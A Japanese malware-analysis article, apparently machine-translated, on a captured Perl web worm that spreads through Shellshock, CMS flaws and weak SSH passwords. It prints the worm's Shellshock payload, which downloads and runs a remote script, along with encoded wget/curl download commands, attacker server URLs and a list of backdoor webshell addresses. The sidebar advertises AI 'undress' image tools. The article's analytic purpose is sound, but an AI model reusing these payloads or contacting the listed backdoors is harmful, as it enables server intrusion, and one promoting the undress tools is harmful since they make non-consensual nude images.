新世代の強力な Web ワームが捕獲され、1,000 を超える Web サイトに感染しました
最近、包括的な脆弱性スキャナーとして機能する、非常に斬新で強力な Web ワームが捕獲されました。このワームは主に、phpmyadmin、wordpress、joomla、magento などのよく知られた Web サイト アプリの脆弱性や、シェル破壊の脆弱性、弱い SSH パスワード、SQL インジェクションなど、一部の Web プログラムの高リスクの脆弱性を利用して拡散します。 、自動権限昇格。
感染したボットはサーバーから指示を受け取り、DDoS 攻撃、脆弱性スキャンを実行して他のホストに感染し、http プロキシとして機能し、IRC サーバーを生成します。分析の結果、感染したホストには Web プロキシとして機能する Web サイトが 1,000 あることが判明しました (悪名高い phpmyadmin ワーム zmeu を含む)。今後、関連するすべてのソース コードを共有します。
0×01 原因
vps の Web ログを調べたところ、zmeu の useragent や Shellshock のペイロードなどの攻撃の兆候が見られました。
次に、私は先導に従い、ボットをゲットシェルしました (WordPress の脆弱性を利用してデータベース構成ファイルをダウンロードし、データベースのパスワードを使用して Wordpress に正常にログインしましたが、プラグインをインストールする権限がなかったので、プラグインを挿入しました)記事が変更された insertPHP プラグインによって解析された php コード (韓国語では 1 時間以上かかりました)。
Web サイトのディレクトリで、セーフ モードのバイパスをサポートし、エージェントをインストールする非常に強力な PHP プログラムを見つけたので、さらに詳しく調べることにしました。
このボットからソース コードをダウンロードした後、衝撃的な CC プログラムを発見しました。
0×02 解析
このワームの pl スクリプト部分だけでも数万行のコードがありますので、不適切な解析があればご指摘ください。ボット ノードはサーバーの脆弱性をスキャンすると、脆弱なホストに制御スクリプトをダウンロードして実行し、ホストはボットになり、最後に制御対象ホストを登録するためにコントローラーに電子メールを送信します。たとえば、Shellshock のペイロード
"() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";
system("wget http://xxxserver.com/shell.txt -O /tmp/shell.txt;curl -O /tmp/shell.txt http://xxxserver.com/shell.txt ;
perl /tmp/shell.txt ; rm -rf shell.txt ");'"
Web脆弱性感染からのプロセスを本筋として分析してみましょう。わかりやすくするために、一部のコードを省略します。
リモート ダウンロード サーバー アドレスを初期化します:
my $rceinjector = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/error.php";
my $ rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/xml.php";
#my $arbitrary = "http://www.handelwpolsce.pl/images/Sport/rce .php";
#my $hostinjector = "wordpress.com.longlifeweld.com.my";
my $thumbid = "http://".$hostinjector."/petx .php";
my $thumbidx = "http://".$hostinjector."/cpx.php";
Linux ダウンロード コマンドが Web パラメーターを介して渡され、ボットが正常に悪用しました。脆弱性 getshell の後、制御されたスクリプトをダウンロードするためのこれらの指示が Webshell に送信されます。
my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."% 2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php";
my $lwpdon = "?cmd=lwp-download%20-a%20http%3A %2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http %3A%2F%2F".$hostinjector."%2Fcpx.php";
my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F %2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C% 20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";
後のバッチ収集に備えて 1000 個の Web プロキシ バックドア アドレスを初期化します
私の @randombarner= ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",
"http://www.villaholidaycentre.co.uk/ include/ js/calendar/lang/seka.php",
"http://viewwebinars.com/wp-includes/errors.php",
"http://www. org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",
"http://www.linuxcompany.nl/modules/mod_login/error .php ",
"http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php",
"http://liftoffconsulting.ca /wp -includes/errors.php",
"http://www.voileenligne.com/audio/komo.php",
"http://www.gingerteastudio.com // wp-content/uploads/components/search.php",
"www.audiovisionglobal.pe/online/includes/js/calendar/lang/search.php",
[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] ] [17] [18] [19] [20] 次のページ

ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック











多くの場合、キーワードと追跡パラメーターで散らかった長いURLは、訪問者を阻止できます。 URL短縮スクリプトはソリューションを提供し、ソーシャルメディアやその他のプラットフォームに最適な簡潔なリンクを作成します。 これらのスクリプトは、個々のWebサイトにとって価値があります

2012年のFacebookによる有名な買収に続いて、Instagramはサードパーティの使用のために2セットのAPIを採用しました。これらはInstagramグラフAPIとInstagram Basic Display APIです。

Laravelは、直感的なフラッシュメソッドを使用して、一時的なセッションデータの処理を簡素化します。これは、アプリケーション内に簡単なメッセージ、アラート、または通知を表示するのに最適です。 データは、デフォルトで次の要求のためにのみ持続します。 $リクエスト -

これは、LaravelバックエンドとのReactアプリケーションの構築に関するシリーズの2番目と最終部分です。シリーズの最初の部分では、基本的な製品上場アプリケーションのためにLaravelを使用してRESTFUL APIを作成しました。このチュートリアルでは、開発者になります

Laravelは簡潔なHTTP応答シミュレーション構文を提供し、HTTP相互作用テストを簡素化します。このアプローチは、テストシミュレーションをより直感的にしながら、コード冗長性を大幅に削減します。 基本的な実装は、さまざまな応答タイプのショートカットを提供します。 Illuminate \ support \ facades \ httpを使用します。 http :: fake([[ 'google.com' => 'hello world'、 'github.com' => ['foo' => 'bar']、 'forge.laravel.com' =>

PHPクライアントURL(CURL)拡張機能は、開発者にとって強力なツールであり、リモートサーバーやREST APIとのシームレスな対話を可能にします。尊敬されるマルチプロトコルファイル転送ライブラリであるLibcurlを活用することにより、PHP Curlは効率的なexecuを促進します

顧客の最も差し迫った問題にリアルタイムでインスタントソリューションを提供したいですか? ライブチャットを使用すると、顧客とのリアルタイムな会話を行い、すぐに問題を解決できます。それはあなたがあなたのカスタムにより速いサービスを提供することを可能にします

2025 PHP Landscape Surveyは、現在のPHP開発動向を調査しています。 開発者や企業に洞察を提供することを目的とした、フレームワークの使用、展開方法、および課題を調査します。 この調査では、現代のPHP Versioの成長が予想されています
